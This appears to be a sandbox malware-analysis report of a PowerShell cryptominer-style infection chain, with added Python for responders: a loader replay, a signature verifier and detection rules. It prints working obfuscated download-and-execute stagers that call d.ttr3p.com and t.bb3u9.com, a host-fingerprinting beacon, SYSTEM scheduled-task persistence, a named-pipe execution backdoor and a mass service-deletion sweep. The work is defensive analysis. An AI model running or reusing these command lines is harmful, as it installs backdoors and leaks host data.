  C:\Windows\system32\cmd.exe /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='dcd9144d509e7c6e1e63ecdd7e50e935';$ifp=$env:tmp+'\m6.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^|Get-Random -Count 100));test1 -PEBytes $bin"

C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe  (depth 4)
  0MSJ3Ad6IVD.exe -
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\cmd.exe  (depth 3)
  "C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&EIDQHRRL^^^&00000000-0000-0000-0000-000000000000^^^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|0MSJ3Ad6IVD.exe -

C:\Windows\system32\cmd.exe  (depth 4)
  C:\Windows\system32\cmd.exe /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='e04acec7ab98362d87d1c53d84fc4b03';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.ttr3p.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^&EIDQHRRL^&00000000-0000-0000-0000-000000000000^&E6:7B:5C:AE:C1:15');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"

C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe  (depth 4)
  0MSJ3Ad6IVD.exe -
  - Executes dropped EXE
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (depth 5)
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\yadmwoyb\yadmwoyb.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (depth 6)
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES158.tmp" "c:\Windows\Temp\yadmwoyb\CSCACE8DAE934C442BE8B6F9F04EE5AD75.TMP"
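The three cmd /c echo ... | 0MSJ3Ad6IVD.exe - stages above (if.bin, m6.bin, kr.bin) pipe a script into a dropped binary that sits in the WindowsPowerShell\v1.0 directory, takes "-" (script on stdin), writes the PowerShell CommandAnalysis cache and spawns csc.exe, which is what a PowerShell host does when Add-Type is called. All three share one cache routine: reuse %tmp%\<name>.bin if its MD5 matches the hard-coded value, otherwise download, keep the download only if its MD5 matches, and otherwise run whatever is already on disk. The m6.bin stage adds a container split: the text up to the first 0x0a byte is executed first (it has to define test1, which is then called with -PEBytes), the remainder is a gzip stream inflated to at most 10,000,000 bytes, written to %tmp%\m6.bin.ori with 100 random bytes appended, then copied to m6.bin.exe and run. The Python below is an added example (not from the report or the sample) that replays that logic offline over a constructed header and a minimal MZ/PE-shaped blob; function names are mine, and the stand-in header is not the real loader script.

```python
import gzip
import hashlib
import os
import random
import tempfile

MAX_PE_BYTES = 10_000_000          # the loader's ReadBytes(10000000) cap


def gmd5(data: bytes) -> str:
    """Same output as the one-liner's gmd5: lowercase hex MD5."""
    return hashlib.md5(data).hexdigest()


def resolve_cached(path: str, expected_md5: str, fetch):
    """Replays the cache logic shared by the if.bin, m6.bin and kr.bin stages.
    fetch() stands in for WebClient.DownloadData and is only called when the
    local copy is missing or has a different MD5. Returns None when nothing
    usable exists (the original leaves $con_ unset in that case)."""
    cached, noup = None, False
    if os.path.exists(path):
        with open(path, "rb") as f:
            cached = f.read()
        if gmd5(cached) == expected_md5:
            noup = True
    con = None
    if not noup:
        con = fetch()
        if gmd5(con) == expected_md5:
            with open(path, "wb") as f:
                f.write(con)
        else:
            noup = True             # download rejected ...
    if noup:
        con = cached                # ... so the on-disk copy runs, whatever its hash
    return con


def split_m6(con: bytes):
    """m6.bin layout: bytes up to and including the first LF are PowerShell
    ($con[0..$i], which must define test1); the rest is a gzip stream with the PE."""
    i = con.find(b"\n")
    if i < 0:
        raise ValueError("no LF separator in m6.bin container")
    header = con[: i + 1]
    pe = gzip.decompress(con[i + 1:])[:MAX_PE_BYTES]
    return header, pe


def hash_busting_copy(pe: bytes) -> bytes:
    """What lands in %tmp%\\m6.bin.ori: the PE plus 100 distinct random bytes from
    1..127 (Get-Random -Count 100 over 1..127). Every host drops a different file
    hash while the image handed to test1 -PEBytes stays identical."""
    return pe + bytes(random.sample(range(1, 128), 100))


def demo():
    # Constructed inputs: a stand-in header line and a minimal MZ/PE-shaped blob.
    header = b"function test1 { param($PEBytes) }  # constructed stand-in"
    fake_pe = b"MZ" + bytes(58) + (64).to_bytes(4, "little") + b"PE\0\0" + bytes(20)
    con = header + b"\n" + gzip.compress(fake_pe)
    expected = gmd5(con)
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "m6.bin")
        fetches = []

        def fetch():
            fetches.append(1)
            return con

        first = resolve_cached(path, expected, fetch)      # miss: downloads and caches
        second = resolve_cached(path, expected, fetch)     # hit: no download
        # Server now advertises a new MD5 but serves junk: the stale copy still runs.
        stale = resolve_cached(path, "0" * 32, lambda: b"not the payload")
        hdr, pe = split_m6(second)
        dropped = hash_busting_copy(pe)
    return {
        "downloaded_once": first == con and len(fetches) == 1,
        "cache_hit": second == con,
        "stale_fallback": stale == con,
        "header_ok": hdr == header + b"\n",
        "pe_ok": pe == fake_pe and pe[:2] == b"MZ",
        "dropped_extra_bytes": len(dropped) - len(pe),
    }
```

Two things the replay makes concrete for a responder: the in-memory PE is what to carve (m6.bin.ori and m6.bin.exe on disk have a per-host tail, so their hashes will not match across machines), and %tmp%\if.bin, m6.bin and kr.bin are worth collecting even when the download URL is dead, because the loader happily runs a cached copy whose MD5 no longer matches the advertised value.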
C:\Windows\system32\sc.exe  (depth 5, 183 invocations)
  Each of the 61 service names below was hit with the same three commands in sequence:
    "C:\Windows\system32\sc.exe" Config <name> Start= Disabled
    "C:\Windows\system32\sc.exe" Stop <name>
    "C:\Windows\system32\sc.exe" Delete <name>
  Names, in the order issued:
    xWinWpdSrv, SVSHost, "Microsoft Telemetry", lsass, Microsoft, system, Oracleupdate, CLR, sysmgt, \gm, WmdnPnSN, Sougoudl,
    National, Nationaaal, Natimmonal, Nationaloll, Nationalmll, Nationalaie, Nationalwpi, WinHelp32, WinHelp64, Samserver,
    RpcEptManger, "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq", SxS, WinSvc, mssecsvc2.1, mssecsvc2.0, Windows_Update,
    "Windows Managers", SvcNlauser, WinVaultSvc, Xtfy, Xtfya, Xtfyxxx, 360rTys, IPSECS, MpeSvc, SRDSL, WifiService, ALGM,
    wmiApSrvs, wmiApServs, taskmgr1, WebServers, ExpressVNService, WWW.DDOS.CN.COM, WinHelpSvcs, aspnet_staters, clr_optimization,
    AxInstSV, Zational, "DNS Server", Serhiez, SuperProServer, ".Net CLR", WissssssnHelp32, WinHasdadelp32, WinHasdelp32, ClipBooks
  The list is a sweep of service names other malware registers under (mssecsvc2.0, WWW.DDOS.CN.COM and the misspelled
  "National" variants), but it also hits legitimate Windows services: "DNS Server" is the DNS Server role on a domain
  controller and AxInstSV is the ActiveX Installer service, so on a DC this run disables and deletes the DNS service.
C:\Windows\system32\schtasks.exe  (depth 5, 58 invocations)
  One "C:\Windows\system32\schtasks.exe" /Delete /TN <name> /F per task name, in the order issued:
    my1, Mysa, Mysa1, Mysa2, Mysa3, ok, "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service",
    "Oracle Products Reporter", "Update service for products", gm, ngm, Sorry, Windows_Update, Update_windows, WindowsUpdate1,
    WindowsUpdate2, WindowsUpdate3, AdobeFlashPlayer, FlashPlayer1, FlashPlayer2, FlashPlayer3, IIS, WindowsLogTasks,
    "System Log Security Check", Update, Update1, Update2, Update3, Update4, DNS, SYSTEM, DNS2, SYSTEMa, skycmd, Miscfost,
    Netframework, Flash, RavTask, GooglePingConfigs, HomeGroupProvider, MiscfostNsi, WwANsvc, Bluetooths, Ddrivers, DnsScan,
    WebServers, Credentials, TablteInputout, werclpsyport, HispDemorn, LimeRAT-Admin, DnsCore, "Update service for Windows Service",
    DnsCore (issued a second time), ECDnsCore
C:\Windows\system32\taskmgr.exe  (depth 5)
  "C:\Windows\system32\taskmgr.exe"
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow

C:\Windows\system32\NETSTAT.EXE  (depth 5)
  "C:\Windows\system32\NETSTAT.EXE" -anop TCP
  - Gathers network information

C:\Windows\system32\schtasks.exe  (depth 3)
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn t.bb3u9.com /F /tr t.bb3u9.com
  - Creates scheduled task(s)

C:\Windows\system32\schtasks.exe  (depth 3)
  "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \ZNnVEs6 /F /tr "powershell -c PS_CMD"
  - Creates scheduled task(s)

C:\Windows\system32\schtasks.exe  (depth 3)
  "C:\Windows\system32\schtasks.exe" /run /tn \ZNnVEs6

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (depth 3)
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\TEMP\gqmicxaz\gqmicxaz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (depth 4)
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES1C76.tmp" "c:\Windows\Temp\gqmicxaz\CSC8B4D4513E4B74A1A8EDFF9BC092F18.TMP"

\??\c:\windows\system32\cmd.exe  (depth 3)
  /c powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose();$pipe.Dispose();I`Ex($cmd);(new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7')).WaitForConnection()

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 4)
  powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose();$pipe.Dispose();I`Ex($cmd);(new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7')).WaitForConnection()
  - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\cmd.exe  (depth 3)
  "C:\Windows\system32\cmd.exe" /c schtasks /create /ru SYSTEM /sc MINUTE /mo 50 /tn \Microsoft\Windows\tecmu /tr C:\Windows\TEMP\tecmu.exe /F

C:\Windows\system32\schtasks.exe  (depth 4)
  schtasks /create /ru SYSTEM /sc MINUTE /mo 50 /tn \Microsoft\Windows\tecmu /tr C:\Windows\TEMP\tecmu.exe /F
  - Creates scheduled task(s)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (depth 2)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?rep_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
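The two powershell.EXE stagers above (they differ only in the `-w hidden` flag and the `mail_` / `rep_` tag in the check-in URL) fetch a stage from t.bb3u9.com, treat its first 172 characters as a base64 RSA signature over the remainder, verify that signature with the embedded 1024-bit public key using RSACryptoServiceProvider.VerifyData with SHA-1 (RSASSA-PKCS1-v1_5), and only then hand the remainder to IEX. The practical consequence for responders: a captured stage can be replayed but not modified, and a sinkholed or seized domain cannot feed infected hosts anything they will run, because only the holder of the matching private key can produce a stage the check accepts; an unsigned or tampered response makes the stager exit silently. The script below is an added example, not code from the report or from the sample: a pure-Python re-implementation of that check, so a captured HTTP body can be triaged offline, plus a parser for the check-in URL shape so proxy logs can be turned into a host fingerprint. The modulus and exponent are copied from the command line above; everything named FAKE_* is constructed input, and the function names are my own.

```python
"""Offline re-implementation of the stage check done by the powershell.EXE
stagers in the process tree. Added analyst example; not code from the report.

Stager logic, as read from the command line:
    d    = bytes of the HTTP response
    sig  = FromBase64String(chars of d[0..171])   # first 172 characters
    body = d[173..]                                # byte 172 is a separator; index $c is
                                                   # one past the end and PowerShell drops it
    if RSA.VerifyData(body, SHA1, sig): IEX(chars of body)
"""
import base64
import hashlib
import hmac
import re

# Public key copied from the stager (RSAParameters: Modulus as base64, Exponent 01 00 01).
MODULUS_B64 = "2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10="
N = int.from_bytes(base64.b64decode(MODULUS_B64), "big")
E = 0x010001
KEY_BYTES = (N.bit_length() + 7) // 8          # 128 for this key

SIG_CHARS = 172       # $d[0..171]
BODY_OFFSET = 173     # $d[173..$c]
# DER DigestInfo prefix for SHA-1 (RFC 8017, section 9.2, note 1)
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")


def split_payload(data: bytes):
    """Return (signature, body), or None when the response is too short or the
    signature field is not valid base64 (the stager then does nothing)."""
    if len(data) <= BODY_OFFSET:
        return None
    try:
        sig = base64.b64decode(data[:SIG_CHARS], validate=True)
    except ValueError:            # binascii.Error is a ValueError subclass
        return None
    return sig, data[BODY_OFFSET:]


def pkcs1v15_sha1_verify(message: bytes, signature: bytes) -> bool:
    """RSASSA-PKCS1-v1_5 verification with SHA-1 (RFC 8017, section 8.2.2), which is
    what RSACryptoServiceProvider.VerifyData does when given a SHA1CryptoServiceProvider."""
    if len(signature) != KEY_BYTES:
        return False
    s = int.from_bytes(signature, "big")
    if s >= N:
        return False
    em = pow(s, E, N).to_bytes(KEY_BYTES, "big")
    t = SHA1_DIGESTINFO + hashlib.sha1(message).digest()
    ps_len = KEY_BYTES - len(t) - 3
    if ps_len < 8:
        return False
    expected = b"\x00\x01" + b"\xff" * ps_len + b"\x00" + t
    return hmac.compare_digest(em, expected)


def stager_would_execute(data: bytes) -> bool:
    """True only for a response the stager would pass to IEX."""
    parts = split_payload(data)
    return parts is not None and pkcs1v15_sha1_verify(parts[1], parts[0])


def body_as_powershell(body: bytes) -> str:
    """Mirror of -join[char[]]$b: one char per byte, no UTF-8 decoding."""
    return body.decode("latin-1")


_BEACON = re.compile(r"https?://([^/]+)/(\w+\.jsp)\?([^?]+)\?(.+)")


def parse_beacon(url: str) -> dict:
    """Decode the check-in URL shape used above:
    http://<host>/a.jsp?<campaign tag>?<COMPUTERNAME>*<USERNAME>*<hardware UUID>*<random>"""
    m = _BEACON.fullmatch(url)
    if not m:
        return {}
    host, path, tag, fingerprint = m.groups()
    fields = fingerprint.split("*")
    if len(fields) != 4:
        return {}
    return {"host": host, "path": path, "campaign": tag, "computer": fields[0],
            "user": fields[1], "uuid": fields[2], "nonce": fields[3]}


# Constructed inputs (not captured traffic): a body nobody signed, and a beacon URL.
FAKE_BODY = b"iex (new-object net.webclient).downloadstring('http://example.invalid/x')"
FAKE_RESPONSE = b"A" * 171 + b"=" + b"\n" + FAKE_BODY     # 128 zero bytes as the "signature"
FAKE_BEACON = ("http://t.bb3u9.com/a.jsp?mail_20210113?"
               "WIN-7VM*Admin*00000000-0000-0000-0000-000000000000*1234567")

if __name__ == "__main__":
    print("key bits:", N.bit_length())
    print("unsigned stage accepted:", stager_would_execute(FAKE_RESPONSE))
    print(parse_beacon(FAKE_BEACON))
```

To triage a real capture, read the raw HTTP response body into `stager_would_execute`; when it returns True, `body_as_powershell(split_payload(data)[1])` is exactly the text the victim would have executed. The same key is embedded in both stagers, so a stage that verifies for one would verify for the other.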
Network
MITRE ATT&CK Matrix ATT&CK v6
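The matrix itself did not survive extraction; the behaviours it would map are the ones in the process tree above: SYSTEM-level scheduled tasks whose action is a Temp path, an inline powershell command or a bare hostname; a sweep of schtasks /Delete calls against a dozen task names belonging to competing or older infections; backtick- and string-concatenation-obfuscated PowerShell; a named-pipe server that IEXes whatever is written to \\.\pipe\HHyeuqi7; and a WebClient download-and-IEX stager. What follows is an added example, not part of the report: rule logic over process-creation command lines (the CommandLine field of a Sysmon event 1 or 4688 record), run over constructed sample lines that mirror the report's entries. The rule names, thresholds and helper names are my own choices.

```python
"""Command-line detection logic for the behaviours in the process tree.
Added example, not part of the sandbox report. Sample lines are constructed
to mirror the report's command lines; rule names and thresholds are mine."""
import re

# Task names swept by the /Delete commands in the process tree.
COMPETITOR_TASKS = {
    "WwANsvc", "Bluetooths", "Ddrivers", "DnsScan", "WebServers", "Credentials",
    "TablteInputout", "werclpsyport", "HispDemorn", "LimeRAT-Admin", "DnsCore",
    "Update service for Windows Service", "ECDnsCore",
}

_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def normalize_ps(cmd: str) -> str:
    """Undo two cheap obfuscations seen above so keyword rules still fire:
    backticks inside cmdlet names (Ne`w-Obj`ect, I`Ex) and 'a'+'b' string
    splitting. Detection normalisation only, not a PowerShell interpreter."""
    s = re.sub(r"`(?=[A-Za-z])", "", cmd)
    while True:
        joined = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        if joined == s:
            return s
        s = joined


_SWITCH = re.compile(r'/(\w+)(?:\s+("[^"]*"|[^/\s]\S*))?')


def schtasks_switches(cmd: str) -> dict:
    """Map schtasks switches to their values: /create -> '', /tn -> 'name', ..."""
    return {m.group(1).lower(): (m.group(2) or "").strip('"') for m in _SWITCH.finditer(cmd)}


def _bare_host(s: str) -> bool:
    """A task action that is just a dotted name, not a program (t.bb3u9.com above)."""
    return (re.fullmatch(r"[\w-]+(\.[\w-]+)+", s) is not None
            and not s.lower().endswith((".exe", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".dll")))


def rule_system_task_untrusted_target(cmd: str) -> bool:
    """schtasks /create as SYSTEM whose action is a Temp path, an inline
    powershell command, or a bare hostname; all three appear in the tree."""
    if "schtasks" not in cmd.lower():
        return False
    sw = schtasks_switches(cmd)
    if "create" not in sw or sw.get("ru", "").lower() != "system":
        return False
    tr = sw.get("tr", "").lower()
    return "\\temp\\" in tr or "powershell" in tr or _bare_host(tr)


def rule_ps_download_and_iex(cmd: str) -> bool:
    s = normalize_ps(cmd).lower()
    fetch = any(k in s for k in ("webclient", "downloaddata", "downloadstring"))
    return "powershell" in s and fetch and ("iex" in s or "invoke-expression" in s)


def rule_ps_namedpipe_iex(cmd: str) -> bool:
    s = normalize_ps(cmd).lower()
    return "namedpipeserverstream" in s and ("iex" in s or "invoke-expression" in s)


RULES = {
    "schtasks_system_task_untrusted_target": rule_system_task_untrusted_target,
    "powershell_download_and_iex": rule_ps_download_and_iex,
    "powershell_namedpipe_iex": rule_ps_namedpipe_iex,
}


def classify(cmd: str) -> list:
    """Names of the per-event rules that match one command line."""
    return [name for name, rule in RULES.items() if rule(cmd)]


def deleted_task(cmd: str):
    if "schtasks" not in cmd.lower():
        return None
    sw = schtasks_switches(cmd)
    return sw.get("tn") if "delete" in sw else None


def delete_sweep(cmds, threshold: int = 5) -> set:
    """Distinct competitor task names deleted across a batch of events
    (empty below the threshold): a single /Delete is routine, a dozen is not."""
    hits = {n for n in map(deleted_task, cmds) if n} & COMPETITOR_TASKS
    return hits if len(hits) >= threshold else set()


_URL = re.compile(r"https?://([\w.-]+)")


def c2_hosts(cmd: str) -> list:
    """Hosts in URLs, after re-joining 'http://'+'t.bb3'+'u9.com' style splits."""
    return sorted(set(_URL.findall(normalize_ps(cmd))))


# Constructed sample lines mirroring the report's process tree (stager abbreviated).
_SWEPT = ["WwANsvc", "LimeRAT-Admin", "DnsCore", "ECDnsCore", "HispDemorn",
          "Update service for Windows Service"]
DELETE_LINES = [r'"C:\Windows\system32\schtasks.exe" /Delete /TN %s /F' % (f'"{n}"' if " " in n else n)
                for n in _SWEPT]
CREATE_DOMAIN_TASK = r'"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn t.bb3u9.com /F /tr t.bb3u9.com'
CREATE_TEMP_TASK = r'schtasks /create /ru SYSTEM /sc MINUTE /mo 50 /tn \Microsoft\Windows\tecmu /tr C:\Windows\TEMP\tecmu.exe /F'
PIPE_SERVER = r"""powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream('\\.\pipe\HHyeuqi7');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();I`Ex($cmd)"""
STAGER = r"""powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);I`ex(-join[char[]]$d)};$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210113?')"""
NETSTAT = r'"C:\Windows\system32\NETSTAT.EXE" -anop TCP'

if __name__ == "__main__":
    for line in DELETE_LINES + [CREATE_DOMAIN_TASK, CREATE_TEMP_TASK, PIPE_SERVER, STAGER, NETSTAT]:
        print(classify(line), c2_hosts(line), line[:60])
    print("delete sweep:", delete_sweep(DELETE_LINES))
```

The per-event rules are deliberately keyed on normalised text rather than the literal strings in this report, so the same logic fires on the next variant that re-splits the URL or moves the backticks; the sweep rule is a batch rule and needs the events grouped by host and a short time window before it is useful.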
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: fc7a5d447f5b9ae5af90f3ea41489c3b
  SHA1: 42e2cbcb746ee8f5625eb9a10d35064331a54846
  SHA256: 05c154fbfdbfe7c4df59737e0af23a2c31b3fd3b0f886ba0e3ce4f63c6dee997
  SHA512: e8bf594f268470de3296bcfd276261ee0c654422315ffe3b0acbe205b75d135ce8c2b12231a4e3822cbcb0ef395ae974dfd3740b81f12d3223d433989b2d9d0f
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 8f22fd82ede5313b18658e11e4f979c1
  SHA1: fdad2d303b908d9ae05daeb1b5eb866504cf7d42
  SHA256: 6bd7ef513b480f8e4ba16d757fd3e18b68c78e0219e5311e11c495de49980e09
  SHA512: 3fd2c3482668e59128702214f297413c97583fad20bb40d29c5def5151f2f663dbcdb9579661a986773317fe072c8ac5a26295d8019a41bad55ea9b85c0c36ff
- C:\Windows\System32\WindowsPowerShell\v1.0\0MSJ3Ad6IVD.exe (listed four times with identical hashes)
  MD5: 4a4cbece09f3b7090046b8aa726611df
  SHA1: f53aa0b940747952babecf6ec7dd5e7bfe0cf96e
  SHA256: f158f6290b79d36a599ede232a8472560c715a8c88924f7a2339259853067ae6
  SHA512: 4759f5966f780929156604d4108bb6283a885f7ab1cd792f662cb12814bec40d6f75446980c8c0fedbbc895ab99ff8f2cb7948aefea552309d47dad97393bc0c
- C:\Windows\TEMP\1liziz1t\1liziz1t.dll
  MD5: e5df39d09be1de937e0efbb3a7482c3f
  SHA1: fc731e155cebab410d28b3c87b7b2edf8a0afb80
  SHA256: 777342dbc067fb2b1238ffd3a4a23e587f26eae49ac8b0ee7c2f080050a60d6f
  SHA512: 681a3da1f01b810d2686ef7a04f08db0fec71e514be1b978be988b3af70e35272c66cbf75dcdd5d8a67c13888801428ab95e213c8ac95bf466b672cea926eea7
- C:\Windows\TEMP\4grphwgc\4grphwgc.dll
  MD5: 2374e0af45a1383aedd491327f89aa27
  SHA1: dd412ca284bf7709f7389ae5e2d7848dd1b2f02e
  SHA256: 76a62051fc634142a0c37357612cf7e02f1063935fa8fb69c756d66292840819
  SHA512: 51fb2668ed4696a08e20b7cb674a1048ab7156407b3bc0b83180252744496beee1afa03d4a100b82e294ffd48fdb55ad15f0c59c123a8ff05bdb761d039e3fc5
- C:\Windows\TEMP\RES158.tmp
  MD5: 95d00fba83ff89600754f3a8c7af0eae
  SHA1: b0cd705a2ff837fe49ddecada053a8bec545f399
  SHA256: e6e380a81c747aa54f9df64b883e5cbe4ad59e0daf02876e9e9b6c176acc8619
  SHA512: 212b6e3f310cb3e190fca4b27113dda629e00ea36b64db2f9f45d13e3840c711a5193c8a97fd548787be535c276194a486d993dbab34b4a31b8bf3b84ae9f6eb
- C:\Windows\TEMP\RES1C76.tmp
  MD5: 3af53713c8cf03ddf08b6383969963a3
  SHA1: 3eaf2edca6be48088dc8ef7b5f619ea63fa93556
  SHA256: 7e8e78d8177f9754439bf0d3e91dede008222f9d9bb0405c6df1b8546d1d68fe
  SHA512: d22bb1c8e73a4dc7a89b11b1e09f86f2ef6186cb054f5ff2943ccdb6f17163dcc6c0384d77fac3bc9e4a285d83f827f1370a33990ab99565cad3a7a1b94bc46f
